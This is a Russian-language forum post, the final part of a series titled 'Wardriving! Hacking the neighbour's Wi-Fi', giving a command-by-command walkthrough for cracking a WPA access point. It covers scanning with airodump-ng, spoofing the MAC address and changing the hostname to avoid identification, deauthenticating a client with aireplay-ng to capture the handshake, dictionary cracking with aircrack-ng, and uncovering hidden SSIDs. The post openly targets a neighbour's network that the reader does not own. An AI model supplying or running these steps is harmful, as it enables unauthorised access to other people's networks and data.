Вардрайвинг! Ломаем Wi-Fi соседа Часть 3 (финальная)

Loony

Member
Пользователь
Регистрация
4 Фев 2025
Сообщения
18
Реакции
2
Продолжение трилогии статей с одноименным названием 😃
Для тех кто не читал -



Ну а мы продолжаем. У нас на пути пример точки доступа с WPA шифрованием!
Сначала мы смотрим что за точка, ее mac адрес, канал на котором она работает, а также клиентов данной точки. Дело в том, что при взламывании WPA handshake (пакет авторизации) получить можно только в процессе авторизации клиента. По этой причине нам нужен клиент который работает с точкой доступа и заставить его переавторизоваться.
Код:
sudo airodump-ng wlan0
Узнаем свой MAC адрес
Код:
ifconfig wlan0
Имеем
  • Мой MAC адрес: 1C:4B:D6:B8:23:E5
  • MAC адрес точки доступа: 00:14:D1:4B:06:7E
  • Канал точки доступа: 6
  • Клиент точки доступа: 00:25:D3:24:B5:DF
Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга. Да канал можно не указывать, как это я делал в первый раз.
Код:
sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0
Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:
Код:
sudo ifconfig mon0 down
sudo macchanger mon0 --mac=00:11:22:33:44:55
sudo ifconfig mon0 up
Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):
Код:
sudo vim /etc/hostname
#Например qwhjvsda
sudo vim /etc/hosts
#Во второй строке тоже самое: qwhjvsda
Ловим пакеты от нашей точки.
Код:
sudo airodump-ng -c 6 -w cap mon0
Тут немного я упростил. Так как у меня всего одна точка была в зоне видимости, то я писал в файл cap все пакеты с 6 канала со всех точек (в моем случае она одна была).
Если точек больше смотри по аналогии с wep шифрованием. В другой консоли делаем следующее:
Код:
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e -c 00:25:D3:24:B5:DF mon0
Так мы заставили клиента с MAC адресом 00:25:D3:24:B5:DF переавторизоваться тем самым в первой консоли сверху появится надпись handshake — т.е. мы поймали пакет авторизации. Можно воспользоваться Wireshark’ом и отслеживать пакеты авторизации по протоколу eapol. Ломаем.
Код:
aircrack-ng -w pass.txt cap-01.cap
А теперь суть. WPA ломать простым перебором плохая идея. На это уйдут годы. По этой причине перебор организуем по словарю. В данном примере словарь pass.txt. Вообще словари Вы можете найти .
Перебор по словарю поможет только в случае легкого пароля, иначе сломать практически нереально. Однако при включенной опции WPS на точке доступа взломать ее становится многим проще. Как это сделать я описал .
Некоторая неприятность — Hidden SSID. Это когда в airodump-ng вместо SSID точки доступы вы видите <length:?> где вместо ? стоит число (это число длина SSID). В этом случае для определения SSID нам нужно либо дождаться клиента к точке доступа, тогда airodump-ng сам определит ее имя, либо вытолкнуть подключенного клиента к примеру вот так:
Код:
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e -c 00:25:D3:24:B5:DF mon0
Тут 00:25:D3:24:B5:DF — MAC клиента, 00:14:d1:4b:06:7e — MAC точки доступа. Собственно все. Благодаря этому инструментарию в принципе можно сломать любую Wi-Fi точку доступа.
Появление ошибки:
mon0 is on channel -1, but the AP uses channel 6 после строки:
Код:
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e -c 00:25:D3:24:B5:DF mon0
Для начала надо при создании интерфейса mon0 указать канал:
Код:
sudo airmon-ng start wlan0 6
Если это не помогло тогда попробуйте еще вот такую команду:
Код:
sudo iwconfig mon0 channel 6
6 — это для примера, в Вашем случае тот канал на котором работает точка доступа. Если после всех попыток по прежнему появляется данная ошибка, то, как заметил Quantum в комментариях, необходимо патчить драйвера. Статья которую привел Quantum в моем случае не помогла по видимому из-за версии драйверов, по этой причине привожу другую которая сработала: .
Далее необходимые команды:
Код:
sudo apt-get install build-essential
wget http://wireless.kernel.org/download/compat-wireless-2.6/
   compat-wireless.tar.bz2
 
tar -jxf compat-wireless.tar.bz2
cd compat-wireless*
wget http://patches.aircrack-ng.org/
   mac80211.compat08082009.wl_frag+ack_v1.patch
 
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/
   channel-negative-one-maxim.patch
 
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
#Иногда нужно подправить следующий участок
gedit scripts/update-initramfs
#*** Найдите подобную строку: KLIB=/lib/modules/2.6.31-wl/build
#*** Исправьте на это: KLIB=/lib/modules/$(uname -r)/build
#Собираем и устанавливаем
make && sudo make install
#Перезагрузка
sudo reboot
После перезагрузки проверяем. Если что то пошло не так то отменить данные действия можно следующей командой:
Код:
sudo make uninstall
Также попробуйте более свежую версию драйверов или выберите наиболее актуальные.
Всем спасибо за внимание! Всем до новых встреч!
 
Сверху